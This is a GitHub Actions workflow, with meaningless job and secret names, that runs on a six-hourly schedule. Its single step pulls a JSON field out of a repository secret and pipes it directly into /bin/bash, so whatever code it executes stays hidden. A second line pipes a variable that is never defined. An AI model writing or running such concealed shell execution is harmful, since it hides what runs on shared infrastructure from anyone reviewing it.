name: zhenmeizhan
on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhenmeizhan
        env:
          gqe206: ${{ secrets.gqe206 }}
        run: |
          echo $gqe206 | jq -r .aqfw30210 | /bin/bash
          echo $cra9132 | jq -r .kfuv9 | /bin/bash

